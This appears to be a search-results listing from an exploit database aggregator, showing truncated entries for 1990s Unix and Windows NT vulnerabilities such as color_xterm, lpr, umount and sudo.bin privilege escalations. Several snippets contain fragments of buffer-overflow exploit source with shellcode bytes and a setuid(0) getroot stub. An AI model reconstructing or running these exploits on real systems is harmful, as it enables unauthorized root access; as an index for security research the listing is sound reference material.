2058 matches found

Exploit DB
added 1997/05/27 12:0 a.m., 17 views

Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (1)

source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. / exploit for colorxterm, modified by zgv / / original exploit coded by Ming Zhang for...

7.4 AI score
Exploits 0

exploitpack
added 1997/05/27 12:0 a.m., 17 views

Slackware Linux 3.13.2 - color_xterm Local Buffer Overflow (2)

Slackware Linux 3.13.2 - colorxterm Local Buffer Overflow 2 / source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. / / colorxterm buffer...

0.5 AI score
Exploits 0

exploitpack
added 1997/05/25 12:0 a.m., 14 views

SGI IRIX 6.2 - eject Local Privilege Escalation (1)

SGI IRIX 6.2 - eject Local Privilege Escalation 1 // source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the...

0.8 AI score
Exploits 0

Exploit DB
added 1997/05/19 12:0 a.m., 48 views

Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer

cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This will vary depending on your libc / ulong...

7.4 AI score
Exploits 0

exploitpack
added 1997/05/16 12:0 a.m., 19 views

SGI IRIX 6.2 - day5notifier Local Privilege Escalation

SGI IRIX 6.2 - day5notifier Local Privilege Escalation !/bin/sh source: https://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely...

0.6 AI score
Exploits 0

Exploit DB
added 1997/05/06 12:0 a.m., 47 views

SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution

source: https://www.securityfocus.com/bid/374/info A vulnerability exists in the webdist.cgi program, as shipped by Silicon Graphics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed wi...

7.4 AI score
Exploits 0

exploitpack
added 1997/04/28 12:0 a.m., 30 views

SGI IRIX 6.5.4 Solaris 2.5.1 - ps(1) Buffer Overflow

SGI IRIX 6.5.4 Solaris 2.5.1 - ps1 Buffer Overflow source: https://www.securityfocus.com/bid/220/info The ps command prints information about active processes on a system. Due to insufficient bounds checking on arguments supplied to ps, it is possible to overwrite the internal data space of the p...

0.6 AI score
Exploits 0

exploitpack
added 1997/04/26 12:0 a.m., 19 views

BSDOS 2.1 DGUX 7.0 Debian 1.3 HP-UX 10.34 IBM AIX 4.2 SGI IRIX 6.4 Solaris 2.5.1 - usrbinX11xlock Local Privilege Escalation (2)

BSDOS 2.1 DGUX 7.0 Debian 1.3 HP-UX 10.34 IBM AIX 4.2 SGI IRIX 6.4 Solaris 2.5.1 - usrbinX11xlock Local Privilege Escalation 2 / source: https://www.securityfocus.com/bid/224/info The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow...

0.5 AI score
Exploits 0

Exploit DB
added 1997/04/08 12:0 a.m., 17 views

Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client

source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the...

7.4 AI score
Exploits 0

exploitpack
added 1997/04/08 12:0 a.m., 19 views

Microsoft Windows NT 4.0 SP5 Terminal Server 4.0 - Pass the Hash with Modified SMB Client

Microsoft Windows NT 4.0 SP5 Terminal Server 4.0 - Pass the Hash with Modified SMB Client source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the...

7.3 AI score
Exploits 0

exploitpack
added 1997/03/23 12:0 a.m., 10 views

Solaris 2.4 - binfdformat Local Buffer Overflow

Solaris 2.4 - binfdformat Local Buffer Overflow --------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode =...

0.4 AI score
Exploits 0

Exploit DB
added 1997/03/05 12:0 a.m., 20 views

HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service

source: https://www.securityfocus.com/bid/352/info Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot wh...

7 AI score
Exploits 0

Exploit DB
added 1996/10/25 12:0 a.m., 72 views

BSD / Linux - 'lpr' Local Privilege Escalation

-------------------------------------- linuxlprexploit.c ---------- include include include define DEFAULTOFFSET 50 define BUFFERSIZE 1023 long getespvoid asm"movl %esp,%eax\n"; void main char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; uchar execshell =...

7.4 AI score
Exploits 0

exploitpack
added 1996/09/23 12:0 a.m., 25 views

SGI IRIX 5.3 - pkgadjust Local Privilege Escalation

SGI IRIX 5.3 - pkgadjust Local Privilege Escalation source: https://www.securityfocus.com/bid/419/info A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. % cat getroot.c int main setuid0...

0.9 AI score
Exploits 0

Exploit DB
added 1996/08/24 12:0 a.m., 50 views

Xt Library - Local Privilege Escalation

include include include define DEFAULTOFFSET 0 define BUFFERSIZE 1491 long getespvoid asm"movl %esp,%eax\n"; mainint argc, char argv char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; char execshell = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0...

7.4 AI score
Exploits 0

Exploit DB
added 1996/08/13 12:0 a.m., 71 views

BSD / Linux - 'umount' Local Privilege Escalation

/ Reminder - Be sure to fix the includes /str0ke / -------------------------------------- linuxumountexploit.c ---------- include include include include include include define PATHMOUNT "/bin/umount" define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp asm"movl %esp, %eax"; mainint argc,...

7 AI score
Exploits 0

Exploit DB
added 1996/02/13 12:0 a.m., 87 views

sudo.bin - NLSPATH Privilege Escalation

include include include include include define PATHSUDO "/usr/bin/sudo.bin" define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp asm"movl %esp, %eax"; mainint argc, char argv uchar execshell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"...

7.4 AI score
Exploits 0

Core Security
added 1976/01/01 12:0 a.m., 3 views

NetMeeting Directory Traversal Vulnerability

Advisory ID Internal CORE-2003-0305-04 Advisory Information: Advisory ID: CORE-2003-0305-04 Bugtraq ID: 7931 CVE Name: None currently assigned. Title: NetMeeting Directory Traversal Vulnerability Class : Input validation error Remotely Exploitable: Yes Locally Exploitable: No Vendors Contacted:...

8.1 AI score
Exploits 0